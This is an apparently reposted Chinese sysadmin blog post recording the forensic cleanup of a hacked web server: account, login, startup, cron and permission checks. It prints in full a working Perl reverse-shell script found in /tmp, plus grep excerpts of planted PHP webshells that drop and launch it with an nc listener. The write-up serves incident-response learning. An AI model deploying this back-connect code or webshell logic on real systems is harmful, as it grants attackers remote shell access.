web
伺服器捉蟲速記
馬上登入伺服器(半夜好睏啊)。執行如下的步驟: 1、
檢查系統帳號,看有沒有異常帳號
--如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為「
…」極端不易察覺。 2、
檢查最近登入使用者的ip:
last 檢視9
月9號以後到目前的情況,經確認,有乙個
ip來路不對。 3、
檢查系統初始化檔案
inittab,
執行級別為
3,為發現異常。一些
hacker
喜歡在這裡下手,加上
respawn
這樣的行,保證他的程式被殺後自動重啟,不屈不撓地抗爭系統管理員的絞殺。 4、
檢查執行級別目錄的指令碼,
ls –al /etc/rc3.d ,
未見異常。 5、
檢查自動任務
crontab –l
,root
使用者和web
執行使用者
www各檢查一遍,未見任何異常。 6、
檢查歷史記錄
history
發現有安裝
sendmail
的情形,問客戶是否有這個,答:不是自己裝的。 7、
檢查web
目錄,發現其許可權為
777,這可讓人不太放心了,心中猜想,可能是從這裡下手了。 8、
檢查一下目錄
/tmp,
發現有個檔案不太對勁,檔名是
spider_bc
,開啟看一下,是個
perl
指令碼,其內容為:
[root@localhost mysql]#more /tmp/spider_bc
#!/usr/bin/perl
use socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo"`id`";/bin/sh';
$0=$cmd;
$target=$argv[0];
$port=$argv[1];
$iaddr=inet_aton($target) || die("error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("error: $!\n");
$proto=getprotobyname('tcp');
socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n");
connect(socket, $paddr) || die("error: $!\n");
open(stdin, ">&socket");
open(stdout, ">&socket");
open(stderr, ">&socket");
system($system);
close(stdin);
close(stdout);
close(stderr);
據客戶開發人員反應,這檔案刪除以後,一會又自動生成了。 9、
初步懷疑是
hacker
利用web
許可權設定及程式漏洞上傳了程式後,自動生成這個檔案,於是進入到**根目錄,然後執行
grep –r 「spider」 * ,
片刻,結果出來了,下面節錄部分:
[root@localhost www]#grep spider_bc * -r
/plusbak/viev.php: echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '
建立/tmp/spider_bc
成功' : '
建立/tmp/spider_bc
失敗';
/plusbak/viev.php: echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗
';/plusbak/viev.php: echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '
建立/tmp/spider_bc.c
成功' : '
建立/tmp/spider_bc.c
失敗';
/plusbak/viev.php: @unlink('/tmp/spider_bc.c');
/plusbak/viev.php: echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗
';/developers/fckeditor/editor/skins/images/images.php: echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '
建立/tmp/spider_bc
成功' : '
建立/tmp/spider_bc
失敗';
/developers/fckeditor/editor/skins/images/images.php: echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗
';/developers/fckeditor/editor/skins/images/images.php: echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '
建立/tmp/spider_bc.c
成功' : '
建立/tmp/spider_bc.c
失敗';
/developers/fckeditor/editor/skins/images/images.php: @unlink('/tmp/spider_bc.c');
/developers/fckeditor/editor/skins/images/images.php: echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗
';/developers/developers/cache/default/index_sql.php : echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '
建立/tmp/spider_bc
成功' : '
建立/tmp/spider_bc
失敗';
/developers/developers/cache/default/index_sql.php : echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗
';/developers/developers/cache/default/index_sql.php : echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '
建立/tmp/spider_bc.c
成功' : '
建立/tmp/spider_bc.c
失敗';
/developers/developers/cache/default/index_sql.php : @unlink('/tmp/spider_bc.c');
/developers/developers/cache/default/index_sql.php : echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '
執行命令失敗';9
、問題基本查明,告知各方,先簡單恢復,明日再戰。
Web伺服器捉蟲速記
web 伺服器捉蟲速記 馬上登入伺服器 半夜好睏啊 執行如下的步驟 1 檢查系統帳號,看有沒有異常帳號 如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為 極端不易察覺。2 檢查最近登入使用者的ip last 檢視9 月9號以後到目前的情況,經確認,有乙個 ip...
Web伺服器捉蟲速記
web 伺服器捉蟲速記 馬上登入伺服器 半夜好睏啊 執行如下的步驟 1 檢查系統帳號,看有沒有異常帳號 如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為 極端不易察覺。2 檢查最近登入使用者的ip last 檢視9 月9號以後到目前的情況,經確認,有乙個 ip...
web伺服器 簡單web伺服器實現
三次握手 一般情況下是瀏覽器先傳送請求資料,c s ack 應答 三次握手成功後,才開始進行通訊資料的收發。四次揮手 一般情況下是客戶端先關閉,給瀏覽器傳送關閉資訊。如果瀏覽器傳送了關閉資訊,但是伺服器沒有回過去,較慢 那麼瀏覽器一直發是不是就會有問題?所以會等待 2msl的時間。一般為2 5分鐘。...